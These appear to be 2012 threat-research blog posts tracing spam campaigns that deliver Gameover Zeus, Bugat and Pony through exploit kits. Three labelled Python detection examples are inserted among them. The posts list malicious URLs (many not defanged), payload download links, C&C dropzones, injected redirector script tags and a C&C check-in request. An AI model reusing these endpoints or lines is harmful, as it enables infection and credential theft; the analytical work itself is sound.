
Careerbuilder spam….again

Back in March, we wrote about a Careerbuilder spam that was used to drop a Gameover Zeus payload.  It turns out that today, we are seeing an identical spam message dropping not a Gameover Zeus payload, but Bugat.

The body of the spam messages are similar to the following:

Hello,

I am a customer service employee at CareerBuilder. I found a vacant position at Security Finance Corporation that you may be interested in based on information from your resume or a recent online submission you made on our site. You can review the position on the CareerBuilder site here:

Chief Business Development Officer

Best wishes in your job search !

Gretchen
Careerbuilder Customer Service Team
CareerBuilder ,5550-A Peachtree Parkway , Norcross, GA 30092

If you compare the text of this spam to the one we saw in March, you will see they are almost identical except for a few words, such as the ‘company’ with the open position and the ‘Careerbuilder Customer Service’ team member’s name.

While the emails utilize several different hyperlink URLs to redirect victims to an exploit kit, each of these URLs seems to end in ‘car.html’.

The car.html pages redirect to a Blackhole exploit kit at masterinsland[.]net/main.php?page=975982764ed58ec3. This domain is hosted at IP address 70.32.97.205. The kit drops the payload via masterisland[.]net/w.php?f=58e0f&e=0. The Bugat payload has the following properties:

MD5: 518648694d3cb7000db916d930adeaaf
File Size:  62,464 bytes
Description: G Data AntiVirus

This variant utilizes the following C&C’s:

zorberzorberzu[.]ru/mev/in/
internetsexcuritee4dummies[.]ru/mev/in/
prakticalcex[.]ru/mev/in/
nalezivmordu[.]in/mev/in/

So, the question here is, is there any connection between the actor installing the March Gameover Zeus payload and the actor installing the current Bugat payload? Or is this merely a shared/copied spam template? Personally, I’m betting there is far more overlap than a copied spam template. We’d love to hear other opinions on this as well.


Re: Fwd: Wire Transfer Confirmation (FED REFERENCE 2862ZO31)

On 2012-04-11 we observed a NACHA-themed spam email with the subject line “Re: Fwd: Wire Transfer Confirmation (FED REFERENCE 2862ZO31)”. The spam sample we analyzed was sent from 186.46.122.162. This IP is a node in a Cutwail spambot.

This spam sample contained a malicious link to http://www.arydan.pl/page-15.htm. It appears that www.arydan.pl is an otherwise legitimate site that was hacked. The spammers placed page-15.htm in the webroot directory of this compromised site. We were able to locate other hacked sites that also contained a malicious page-15.htm. Other hacked sites included:

http://www.brochurepedia.nl/page-15.htm
http://www.mocvi.ge/page-15.htm
panda-roux.fr/page-15.htm

While there were likely many other hacked sites, the page-15.htm file appears to be a good indicator for this particular campaign. Unfortunately, this indicator is likely to be short lived and the spammers will almost certainly alter this pattern in future attacks.

The malicious page-15.htm files contained malicious javascript that redirected victims to a Phoenix Exploit kit at webmastaumuren.ru:8080/img/?promo=nacha. It is worth noting that this Phoenix Kit at webmastaumuren.ru imports content from the legitimate nacha.org website in an effort to construct a well designed phishing website. We previously saw this same technique in an earlier NACHA-themed campaign on 2012-02-28.

This exploit kit in turn handed victims off to another exploit kit at dedovshinaus.su:8080/pages/dq.php?i=8. The kit at dedovshinaus.su drops the following Gameover Zeus variant on its victims:

Size: 301096
MD5: C23C96D34C2D408E20C24F07DFE8E078

Victims that clicked on the report-ACH285369733632711US.exe link in the NACHA phishing site also downloaded the same Gameover Zeus variant (i.e. the same MD5 hash). This payload was digitally signed with a certificate labeled ‘t9H2RXj1BlhxLEQ’.

This Gameover variant had a botid of mf222a11. The operators of this campaign controlled victims via a proxy server at 200.58.99.114 over port 443. This is the same proxy server used in the BillMeLater spam campaign seen earlier today.

Your Flightticket

On Monday April 9, 2012, we examined a spam email with the subject line “Your Flightticket”. This spam message contained the following text:

Dear Customer,

FLIGHT NUMBER 3702-5114295

DATE/TIME : APRIL 16, 2011, 17:16 PM
ARRIVING AIRPORT: NEW-YORK AIRPORT
PRICE : 3872.58 USD

Your bought ticket is attached to the letter as a scan document (Internet Exlporer File).

To use your ticket you should print it.

Nelda Sharpe,

The attached zip file had an MD5 of b9502c28044ad8335beca132c3c81b12. The zip file contained an html file. This html file contained malicious javascript that redirected victims to a Phoenix Exploit kit at 112.78.124.115:8080/navigator/jueoaritjuir.php. Victims were then redirected to a second Phoenix Exploit kit at engineofsovjets.su:8080/navigator/frf3.php?i=8.

The Phoenix kit at engineofsovjets.su dropped a Pony downloader with the following properties:

File: dsarcubqinhsjqkugsbm.exe
Size: 147496
MD5: E6F5310AC836E48C3B4181E1C00CE4CD

This Pony downloader was signed with a digital certificate labeled “4mb5gWTlIemu0h0”.

This Pony downloader was configured to send stolen FTP and other web admin credentials to dropzones at:

http://www.alberghi.com:8080/pony/gate.php
http://buyandsmile.atomclick.co:8080/pony/gate.php

This Pony downloader was also configured to download a Gameover Zeus payload from the following locations:

http://contabilidadesr.com.br/1mmF86V8/Vdqu.exe
http://www.vandenboschelektro.be/vgwCwvDs/Y9fNYJCs.exe
http://geovanabauerdocesfinos.com.br/6md3zev5/hQj.exe

This Gameover Zeus variant had the following properties:

Size: 305704
MD5: 01D994DF6DBDA4F49E8A6D9CB0005485

This Gameover variant had a botid of mf222a10. Oh yeah, it was also signed with the same digital cert – “4mb5gWTlIemu0h0”.

Where have we seen that digital cert before? Oh yeah, the Newegg.com-themed campaign from April 9, 2012 also signed its Pony and Zeus payloads with the same digital certificate.

This fact is significant because the Newegg campaign leveraged a Blackhole Exploit Kit infrastructure whereas the Flightticket-themed campaign leveraged a Phoenix Exploit Kit infrastructure. While these campaigns leverage different exploit kit infrastructures, it seems clear that they are related, as they are dropping the same malware families and are signing payloads with the same digital certificates.

Newegg.com – Payment Charged

On 2012-04-09 we observed a Newegg.com-themed spam template. The spam message that we observed had a subject line of “Newegg.com – Payment Charged” and was sent from a Cutwail spambot.

The observed spam contained a malicious link to http://game.knightscricket.co.za/SpwNjjYt/index.html. There were likely other Newegg.com-themed spam messages associated with this campaign that contained different malicious links and had different subject lines.

The above malicious page, http://game.knightscricket.co.za/SpwNjjYt/index.html, contained the following javascript redirectors:

<script type="text/javascript" src="http://congress-assistants.fi/idm2TZP1/js.js"></script>
<script type="text/javascript" src="http://primasaleorganik.com/3N6zKxSS/js.js"></script>

These javascript redirectors bounced victims to an exploit kit at http://216.224.182.94/showthread.php?t=d7ad916d1c0396ff.
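
The landing pages in these campaigns share one shape: a short HTML shell that pulls in external js.js redirectors from unrelated compromised domains, each under a single eight-character directory. The following is an added example (not code from the original post) that extracts every script source from such a page and flags the third-party ones matching that path pattern; the HTML sample is constructed around the two script tags shown above, and the page host and the extra same-site script are assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the two script tags come from the post, the
# surrounding shell and the same-site analytics script are assumptions.
SAMPLE_LANDING_PAGE = """
<html><body>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://congress-assistants.fi/idm2TZP1/js.js"></script>
<script type="text/javascript" src="http://primasaleorganik.com/3N6zKxSS/js.js"></script>
<script type="text/javascript" src="/static/analytics.js"></script>
</body></html>
"""

# Path shape of the redirector scripts seen across these campaigns:
# exactly one eight-character alphanumeric directory, then js.js.
REDIRECTOR_PATH = re.compile(r"^/[A-Za-z0-9]{8}/js\.js$")


class ScriptSrcExtractor(HTMLParser):
    """Collect the src attribute of every <script> tag in document order."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append(value)


def extract_script_sources(html):
    parser = ScriptSrcExtractor()
    parser.feed(html)
    return parser.sources


def flag_redirectors(html, page_host):
    """Return script sources hosted off page_host whose path matches
    the /<token>/js.js redirector shape."""
    flagged = []
    for src in extract_script_sources(html):
        parsed = urlparse(src)
        if not parsed.netloc or parsed.netloc.lower() == page_host.lower():
            continue  # relative or same-origin script: not a third-party redirector
        if REDIRECTOR_PATH.match(parsed.path):
            flagged.append(src)
    return flagged


if __name__ == "__main__":
    for src in flag_redirectors(SAMPLE_LANDING_PAGE, "game.knightscricket.co.za"):
        print("redirector:", src)
```

The same path shape recurs in the Verizon, Careerbuilder and Intuit posts below, so the check generalizes beyond this one landing page; the host-comparison step keeps a site's own scripts out of the result.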

This exploit kit dropped a Pony downloader with the following properties:

Size: 147496
MD5: DFDA409D8BCC7CDDBBB39A40E388E8BA

This Pony downloader was signed with a digital certificate labeled “4mb5gWTlIemu0h0”.

This Pony downloader was configured to send stolen FTP and other web admin credentials to dropzones at:

http://www.alberghi.com:8080/pony/gate.php
http://buyandsmile.atomclick.co:8080/pony/gate.php

Hrm, notice that the domain alberghi.com, home to a Pony drop in this campaign, was also home to a Blackhole Exploit kit in a previous American Express-themed spam campaign.

The above Pony downloader, DFDA409D8BCC7CDDBBB39A40E388E8BA, was also configured to download a Gameover Zeus payload from the following locations:

http://finskiydom.com.ua/JdS.exe
http://developerspk.com/DeYhzGj.exe
http://mestraimoveis.com.br/0Ev34x.exe
http://www.bmsevero.com.br/J1eGwcP.exe

This Zeus payload had the following properties:

Size: 305704
MD5: D76F25DF18F89830323CD6DECD657574

Interesting … this Zeus payload was signed with the same digital cert as the above Pony downloader. The Zeus payload’s digital cert had the same “4mb5gWTlIemu0h0” label.

This Zeus variant had a botid of “NRa10”.

Xerox, Your Flight, and Intuit

Just when we thought we had the attackers figured out, they went and switched things up on us.  Previously any of the spam campaigns that had an .htm attachment redirected to a Phoenix exploit kit which then installed Bugat/Feodo/Cridex.  Well, today, we noticed that these spam messages with .htm attachments are still redirecting to a Phoenix exploit kit but installing a Pony Loader binary which then installs Gameover Zeus.

3 separate spam themes were observed:

Your Intuit.com software order.

Fwd: Scan from a Xerox W. Pro #858678

Fwd: Your Flight F 458-37826

These .htm attachments contain scripts which are used to redirect to Phoenix exploit kits at the following URLs:

sumanoidos[.]ru:8080/navigator/jueoaritjuir.php
selenasopka[.]ru:8080/navigator/jueoaritjuir.php
sonografx[.]ru:8080/navigator/jueoaritjuir.php

All of the above Phoenix domains are hosted via the same fast flux network at the following IP addresses:

78.83.233.242
78.107.82.98
89.218.55.51
118.97.9.60
125.19.103.198
41.66.137.155
41.168.5.140
61.187.191.16
62.85.27.129
219.94.194.138
180.235.150.72
194.85.97.121
200.169.13.84
202.149.85.37
210.56.23.100
210.56.24.226
210.109.108.210

The payload, Pony Loader, is installed via poosdfhhsppsdns[.]su:8080/navigator/frf3.php?i=6&f=c0af9&e=0:

file name: dsarcubqinhsjqkugsbm.exe
file size: 95,272 bytes
md5: 90222ad40f07231a35c37fbbc4a6e91d
This file is digitally signed:

This Pony Loader posts to a C&C at 91.121.178[.]156/pony/gate.php. It then attempts to download a Gameover Zeus binary from the following URLs:

http://www.ciupanezu[.]ro/6rBQWWdx/9ZR.exe
hosbos.com[.]br/rvrsraDu/p7t.exe
http://www.omegaconstrucciones.com[.]ar/UK90biGf/QS6TvK2.exe

file size: 304,168 bytes
md5: a2e0ac37b5cd193262ce7eb1ea72ba50
Ironically, this file has the exact same digital signature as the above Pony Loader:

The Gameover Zeus variant connects to a drop at 173.166.31.129:15471 and uses a bot ID of mf222a3.

So what does this new trend tell us?  Well, it looks like the actors using Bugat may switch to Gameover Zeus to supplement their infections.  We have yet to see any Bugat installs today.

Your Bill Is Now Available

We saw a return of Verizon Wireless-themed spam today. The sample in question had a subject line of “Your Bill Is Now Available” and was sent from a Cutwail spambot at 86.120.45.80.

This sample had the following malicious links:

casinhajoia.com.br/CvBvr8r9/index.html
coastcruises.com.au/nS9X51yA/index.html
ftp.chirvancontract.gr/K7qjpRQ7/index.html
enil1.home.pl/nS9X51yA/index.html
ftp.bobstudio.com.hk/LgBXz0BV/index.html

These malicious links contained the following html code:

<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type="text/javascript" src="http://colecoesearte.com.br/Kypp5Enk/js.js"></script>
<script type="text/javascript" src="http://rafaeltezelli.com.br/G1GCPjut/js.js"></script>

These javascript redirectors in turn bounced victims to a Blackhole Exploit kit at wildestant.com/showthread.php?t=d7ad916d1c0396ff.

Vulnerable victims directed to the above URL at wildestant.com then downloaded a Pony downloader with the following properties:

File: about.exe
Size: 95785
MD5: 14D9C851566E0C66EF67E2C08E6866A7

This Pony downloader posted stolen FTP credentials to http://88.85.99.44:8080/pony/gate.php. The downloader was also configured to communicate with the following backup dropzones in the event the primary at 88.85.99.44 was unavailable. The backup drops were located at:

http://91.121.140.103:8080/pony/gate.php
http://91.121.178.156:8080/pony/gate.php

The Pony downloader was also configured to download a Gameover Zeus variant from the following locations:

http://gnarlybuys.info/LMbir.exe
http://karinasadvertising.com/vXFEiixu.exe
http://mancomunidadcentro.org.bo/wN7iM.exe
http://100s.pl/jQnoeUC.exe

This Gameover variant had the following properties:

Size: 262696
MD5: B818C5240F3D45A123F2A497ACA8BEA1

This Gameover variant sent stolen data to drop zones at:

188.230.92.97:15043
93.177.168.141:16115

Web injects were downloaded from 93.177.168.141:16115.

Note, we also observed other Blackhole exploit kits at:

184.82.202.46
69.164.199.162


Careerbuilder spam delivers more than just a new job posting

Our Gameover Zeus friends are hoping that you are looking for a new job with the latest Careerbuilder spam campaign which claims to contain a link to a position that you would be interested in.

This campaign uses some of the following subject lines:

You might be interested in this vacant position.
Careerbuilder.com has found an open position for you
Careerbuilder.com open positions suggestion.
New position found for you at Careerbuilder.com.

The sample analyzed contained links to 3 different compromised websites:

starrculinary[.]com/tMp7j7qT/index.html
wsndesign[.]com/thwzcFQd/index.html
whiteoak.co[.]za/thwzcFQd/index.html

These websites redirected to JS files at the following locations:

hedef-ik[.]com/SXgUX3Zp/js.js
maxtroholidays[.]com/Hk89vZp3/js.js
runa.dp[.]ua/4cstVpNa/js.js
http://www.dimarcoagenziaassicurazioni[.]it/Tr39e5sz/js.js

In typical fashion, the Javascript is used to redirect to a Blackhole exploit kit. Today’s kit continues on the ‘slick’ theme we saw yesterday – slickvenue[.]com/showthread.php?t=d44175c6da768b70.

This kit attempted to download the following exploits:

score.swf
Detected by 20/43 vendors on VirusTotal.

Qai.jar
Detected by 0/43 on VirusTotal.

field.swf
Detected by 17/43 on VirusTotal.

10a1e.pdf
Detected by 3/43 on VirusTotal.

It then installed the Gameover Zeus binary via slickvenue[.]com/q.php?f=e0c3a&e=0:

File Name: contacts.exe
MD5: 565f1a0802d1320ef3e28a98567fca95
Size: 284184 bytes
This file is detected by 9/43 on VirusTotal.

Gee, this file is signed with a very familiar looking digital signature (see yesterday’s ‘Fraud Protection Alert’):

This Gameover Zeus variant is currently posting to a drop zone at 183.178.102[.]107:26672/index.php and uses a BotID of ‘ppcz20’.

Spammed Goo.gl Links – Part 2

One thing that we seem to have noticed (granted, we have limited visibility into all spam campaigns) is that when the spam campaigns using Google’s link shortening service aren’t distributing malware, they are being used to redirect visitors to pharma websites. We thought we’d look at where these were redirecting in a little more depth today. So first we started to look at how the links were being delivered and were surprised to see that forum spam appeared to be a primary distribution method. Here’s an example:

This spam contains 5 links so we thought we’d follow each of them and were again surprised to see the results:

The first link, goo.gl/syRGc, redirects to a rogue antivirus program called ‘Windows Trojans Sleuth’ via security-software-fgfdgf.info

The second link, goo.gl/x4IbG, redirects to a ‘Pharmacy online’ at bluepillss.comsyhost.com

The third link, goo.gl/J11W4, redirects to a ‘ViaGrow’ website at hifrino.ru

The fourth link, goo.gl/20yq0, redirects to an English/Spanish/French (?) language ‘Pills and Tabs’ website at bluepillstab.com

The fifth link, goo.gl/Ug1NW, redirects to mobile monitoring software at mspymobile.com

It looks like affiliate programs may be a good supplement to the income generated from Bugat/Gameover Zeus malware campaigns…as if that wasn’t enough.

Moar Intuit Spam

Ugh, another day … another Intuit-themed spam run. Instead of including malicious links with the URL pattern /intu.html, today’s spam run linked to /int-market.html. The bad links redirected victims to a Blackhole Exploit kit at migdaliasbistro[.]net.

This exploit kit dropped a Bugat/Feodo payload with the MD5 e6e3f2dd452fad8d88E8156a4fa7ca2f.

This payload retrieved its configuration file/target list via a POST request to a command and control server at hbirjhcnsuiwgtrq[.]ru/rwx/B2_9w3/in/.

Note that the domain migdaliasbistro[.]net was hosted on a fast-flux network. This domain had A records with a TTL of 900 seconds and currently resolved to 41.64.21.71 as well as 213.179.193.132. A quick review of these IPs shows that they previously hosted Blackhole Exploit kits used in previous campaigns that we’ve covered in our posts “Triple Barrel Spam Cannon” and “Your Intuit Order”. Domains previously hosted on these IPs include:

  • perikanzas.com
  • 110hobart.com
  • energirans.net
  • hapturing.net
  • housespect.net
  • synergyledlighting.net

The command and control server domain at hbirjhcnsuiwgtrq[.]ru was also hosted on a fast-flux network. This domain’s A record had a TTL of 60 seconds and currently resolved to the following IPs:

83.170.91.152
87.120.41.155
94.20.30.91
98.103.133.13
46.137.85.218
62.183.104.36
173.203.211.157

The fast-flux network used to host the command and control domain at hbirjhcnsuiwgtrq[.]ru appears to be separate and distinct from the network hosting the exploit kit at migdaliasbistro[.]net. Note that the IPs hosting the hbirjhcnsuiwgtrq[.]ru domain overlap with the IPs mentioned in “The Redret Connection”.
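
Two traits mark the fast-flux hosting described here and under “Xerox, Your Flight, and Intuit” above: a short A-record TTL (60 and 900 seconds) and a set of addresses scattered across unrelated networks, which a single hosting provider or CDN rarely shows. The following is an added example (not code from the original post) that turns a set of DNS observations into those features and applies the check. The observations for the two domains use the TTLs and addresses reported in this post; the two control entries, a static host and a CDN-like record, are constructed assumptions using RFC 5737 documentation addresses.

```python
import ipaddress

# Constructed observations: the two campaign domains carry the TTLs and
# addresses from the post; the two control entries are assumptions added
# for contrast and use RFC 5737 documentation addresses.
DNS_OBSERVATIONS = {
    "hbirjhcnsuiwgtrq.ru": {
        "ttl": 60,
        "ips": ["83.170.91.152", "87.120.41.155", "94.20.30.91", "98.103.133.13",
                "46.137.85.218", "62.183.104.36", "173.203.211.157"],
    },
    "migdaliasbistro.net": {"ttl": 900, "ips": ["41.64.21.71", "213.179.193.132"]},
    "www.example.com": {"ttl": 3600, "ips": ["192.0.2.10"]},                 # static host
    "cdn.example.net": {"ttl": 60, "ips": ["203.0.113.10", "203.0.113.11"]},  # CDN-like
}

# Both flux domains in the post sit at or below this TTL.
SHORT_TTL_SECONDS = 900


def flux_features(ttl, ips):
    """Summarise one domain's resolutions into the features the check uses."""
    addrs = {ipaddress.ip_address(ip) for ip in ips}
    return {
        "ttl": ttl,
        "distinct_ips": len(addrs),
        # First octet is a coarse stand-in for 'different networks'; a real
        # pipeline would map each address to its ASN instead.
        "distinct_slash8": len({a.packed[0] for a in addrs}),
    }


def is_fast_flux(features):
    """Short TTL plus addresses spread over more than one unrelated network."""
    return (features["ttl"] <= SHORT_TTL_SECONDS
            and features["distinct_ips"] >= 2
            and features["distinct_slash8"] >= 2)


def classify(observations):
    """Return the names of domains whose resolutions look fast-flux hosted."""
    return [name for name, obs in observations.items()
            if is_fast_flux(flux_features(obs["ttl"], obs["ips"]))]


if __name__ == "__main__":
    for name, obs in DNS_OBSERVATIONS.items():
        feats = flux_features(obs["ttl"], obs["ips"])
        print(f"{name:24s} {feats} -> {'FLUX' if is_fast_flux(feats) else 'ok'}")
```

The CDN-like control shows why the network-diversity test matters: a short TTL alone would flag every load-balanced site, while two addresses inside the same /8 is what ordinary anycast or CDN hosting looks like. Accumulating resolutions over time (union of addresses per domain) makes the distinct-network count more reliable than a single lookup.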

Your Intuit Order

Over the last two days we observed two different spam campaigns spoofing communications from Intuit.

The first campaign, observed yesterday 2012-02-29, contained a malicious link to sumero2[.]sicakcikolata[.]com/intu.html. Additional spam samples included similar links to URLs ending in /intu.html. This page redirected victims to a Blackhole Exploit kit at perikanzas[.]com. This kit dropped a Bugat/Feodo payload with the MD5 7cb6acde5f89832fd4f2e69b20c26d4d. This Bugat/Feodo variant retrieved a configuration file/target list via the following POST request to a command and control server at wiwwkvjkinewgycb.ru:

POST /rwx/B2_9w3/in/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: wiwwkvjkinewgycb.ru:8080
Content-Length: 97
Connection: Keep-Alive
Cache-Control: no-cache
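
The check-in above has three traits that recur in the Bugat/Feodo posts on this page: a POST to a /rwx/<token>/in/ (or, in the first post, /mev/in/) path, a Host header on port 8080, and a fixed User-Agent string. The following is an added example (not code from the original post) that parses a raw HTTP request head and reports which of those indicators it carries. The captured request is the one shown above with its body omitted as in the post; the benign request used for contrast is constructed.

```python
import re

# The check-in captured in the post (the body was not shown, so it is
# omitted here as well; Content-Length is kept as reported).
BUGAT_CHECKIN = (
    "POST /rwx/B2_9w3/in/ HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)\r\n"
    "Host: wiwwkvjkinewgycb.ru:8080\r\n"
    "Content-Length: 97\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)

# Constructed benign request for contrast (not from the post).
BENIGN_POST = (
    "POST /api/login HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0\r\n"
    "Host: intranet.example.com\r\n"
    "Content-Length: 42\r\n"
    "\r\n"
)

# C&C path shapes from the posts on this page: /rwx/<token>/in/ and /mev/in/
CNC_PATH = re.compile(r"^/(?:rwx/[^/]+/in|mev/in)/$")
# Exact User-Agent string from the captured check-in
CNC_USER_AGENT = "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"


def parse_request(raw):
    """Split a raw HTTP request head into method, target, version and headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def host_port(headers, default=80):
    """Return (hostname, port) from the Host header, defaulting the port."""
    host = headers.get("host", "")
    if ":" in host:
        name, port = host.rsplit(":", 1)
        return name, (int(port) if port.isdigit() else default)
    return host, default


def checkin_indicators(raw):
    """List which of the three check-in indicators a request matches."""
    req = parse_request(raw)
    hits = []
    if req["method"] == "POST" and CNC_PATH.match(req["target"]):
        hits.append("cnc-path")
    if host_port(req["headers"])[1] == 8080:
        hits.append("port-8080")
    if req["headers"].get("user-agent") == CNC_USER_AGENT:
        hits.append("user-agent")
    return hits


if __name__ == "__main__":
    print("captured:", checkin_indicators(BUGAT_CHECKIN))
    print("benign:  ", checkin_indicators(BENIGN_POST))
```

The path pattern is the most durable of the three: the port and User-Agent are trivially changed, while the /rwx/…/in/ layout persisted across the two Intuit campaigns described here, so a rule that requires the path plus at least one of the other two keeps false positives low without depending on a single string.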

Another spam campaign seen today sent almost the same spam template spoofing communications from Intuit. The text was identical but the formatting was slightly different.

A sample from today’s campaign contained a malicious link to premiumsoft[.]com[.]ar/fe28oiHd/index.html. By now, we should all recognize the pattern in the URL and know that this malicious link will contain javascript redirectors that send victims to a Blackhole Exploit Kit that drops Gameover Zeus. In this specific case premiumsoft[.]com[.]ar/fe28oiHd/index.html contained the following javascript redirectors:

hxxp://kocaelibakimrehabilitasyon[.]gov[.]tr/TXvNpbbR/js.js
hxxp://nestahotel[.]com/jNN7XEMM/js.js
hxxp://trendhome[.]org/bHrL1Bpk/js.js
hxxp://www[.]tncas[.]com/KzXgGvRV/js.js
hxxp://www[.]umutpirinci[.]com/sxrwX5TS/js.js

These malicious scripts redirected victims to a Blackhole Kit at trucktumble[.]com. This kit dropped a Gameover Zeus payload with the following properties:

Size: 285184
MD5: 2D24DF1A327094AA18DB9DE7554C4E8C

This Zeus variant had a bot id of ‘mmz1’ and sent stolen banking credentials to a drop zone at 88.216.22.31 over port 27724.

It can’t be a coincidence that almost the same spam template was used in two different spam campaigns that dropped two different malware payloads, can it?